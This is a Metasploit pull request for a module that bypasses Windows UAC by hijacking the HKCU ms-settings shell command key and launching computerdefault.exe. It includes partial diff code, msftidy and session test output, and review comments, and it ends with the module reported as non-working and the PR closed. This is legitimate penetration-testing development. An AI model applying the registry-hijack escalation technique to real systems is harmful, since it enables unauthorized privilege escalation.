### PR TITLE
Bypassuac computerdefault

### PR DESCRIPTION
**Pull request by St0rn**
Bypass UAC via computerdefault for metasploit.
Bypassuac_computerDefault.rb.

### CODE REVIEW

**Comment by bwatters-r7** [comment]
From the Travis testing:
```
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/windows/local/bypassuac_computerDefault.rb - [INFO] No CVE references found. Please check before you land!
modules/exploits/windows/local/bypassuac_computerDefault.rb - [ERROR] Incorrect disclosure date format
modules/exploits/windows/local/bypassuac_computerDefault.rb - [WARNING] Filenames must be lowercase alphanumeric snake case.
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------
```

**Comment by bwatters-r7** [comment]
Some strangeness going on with sanity tests.... the session is there, but it seems... _angry_
```
[-] WARNING! The following modules could not be loaded!
[-] 	/home/msfuser/rapid7/metasploit-framework/modules/exploits/windows/local/bypassuac_computerDefault.rb: Msf::Modules::MetasploitClassCompatibilityError Failed to load module (windows/local/bypassuac_computerDefault from /home/msfuser/rapid7/metasploit-framework/modules/exploits/windows/local/bypassuac_computerDefault.rb) due to Missing compatible Metasploit<major_version> class constant
...
> sessions -C sysinfo

Active sessions
===============

  Id  Type                   Information                      Connection
  --  ----                   -----------                      ----------
  1   meterpreter x64/win64  WIN2016X64\vagrant @ WIN2016X64  192.168.15.31:35942 -> 192.168.16.182:30001 (192.168.16.182)
...
> use post/test/railgun
[-] Failed to load module: post/test/railgun

```

**Comment by St0rn** [comment]
Hi, Ok.
I chec kthis tomorrow.

File: modules/exploits/windows/local/bypassuac_computerDefault.rb [hunk 1]
```diff
@@ -0,0 +1,206 @@
...
+  include Post::Windows::Runas
+
+  COMPUTERDEFAULT_DEL_KEY     = "HKCU\\Software\\Classes\\ms-settings".freeze
+  COMPUTERDEFAULT_WRITE_KEY   = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
+  EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
+  EXEC_REG_VAL          = ''.freeze # This maps to "(Default)"
+  EXEC_REG_VAL_TYPE     = 'REG_SZ'.freeze
+  COMPUTERDEFAULT_PATH        = "%WINDIR%\\System32\\computerdefault.exe".freeze
+  CMD_MAX_LEN           = 16383
+
```
Comment (bwatters-r7) [inline modules/exploits/windows/local/bypassuac_computerDefault.rb]: Might as well align these '='

File: modules/exploits/windows/local/bypassuac_computerDefault.rb [hunk 2]
```diff
@@ -0,0 +1,206 @@
...
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+        'DefaultTarget' => 0,
+        'References'    => [
+          [
+            'URL', 'https://github.com/St0rn/Windows-10-Exploit/blob/master/uac_computerDefault.py'
+          ]
+        ],
+        'DisclosureDate' => 'October 22 2018'
```
Comment (bwatters-r7) [inline modules/exploits/windows/local/bypassuac_computerDefault.rb]: Oct 22 2018

**Review by bwatters-r7 — CHANGES_REQUESTED** [review]
Hi there, @St0rn!  Thanks for the PR, but I have a few suggestions.  The specifics are listed in the code review, but for some general things:
(1) You have used the existing fodhelper module as a base, and that's exactly what I would do, but you have not changed any of the fodhelper comments, so future devs working on this would be confused.  Please update the comments to this module.  
(2) You based this on an old branch, so testing is a bit off, because whoever tests it must merge it into master to be able to test it.  There's no need to rebase or merge yourself, as I will do that while landing, but in the future, please try to use the current master branch as the base.
(3) Right now, you are failing msftidy, so please run: `tools/msftidy.rb modules/exploits/windows/local/bypassuac_computerDefault.rb` to see the warnings/errors.
(4) For some more 'Ruby'-centric suggestions, please run rubocop on this module (https://github.com/rapid7/metasploit-framework/wiki/Using-Rubocop)
(5) Please add a documentation markdown file.  You can find a guide here: https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation

File: modules/exploits/windows/local/bypassuac_computerDefault.rb [hunk 3]
```diff
@@ -0,0 +1,206 @@
...
+
+  def exploit
+    commspec = '%COMSPEC%'
+    registry_view = REGISTRY_VIEW_NATIVE
+    psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
+
+    # Make sure we have a sane payload configuration
+    if sysinfo['Architecture'] == ARCH_X64
+      if session.arch == ARCH_X86
+        # fodhelper.exe is x64 only exe
```
[the remark this answers is not in the document]
Comment (St0rn) [reply modules/exploits/windows/local/bypassuac_computerDefault.rb]: Yes, I have use a base exploit for computerDefault, sorry...

**Comment by St0rn** [comment]
Thx bwatters-r7,
I check for modify the code this week.

**Comment by bwatters-r7** [comment]
This does not appear to work; I verified that the registry entries are created and launched the exe as required, and nothing fires off.

**Comment by wchen-r7** [comment]
Hmm so the module is looking for a `ComputerDefault.exe`, but my Windows 10 only has a `ComputerDefaults.exe` (notice the s).... could it be why it's not working?

**Comment by bwatters-r7** [comment]
@wchen-r7 nope.  You can play with my updated version of this here: https://github.com/bwatters-r7/metasploit-framework/tree/land-10886-updated

**Comment by bwatters-r7** [comment]
@wchen-r7 makes sense to me.  I am going to close it for mow, but I am happy to reopen it if @St0rn gets a chance to update it.

**Comment by jmartin-r7** [comment]
Tagged `re-no-release-notes` for now due to inadvertent merge that has been reverted.

**Pull request closed without merging**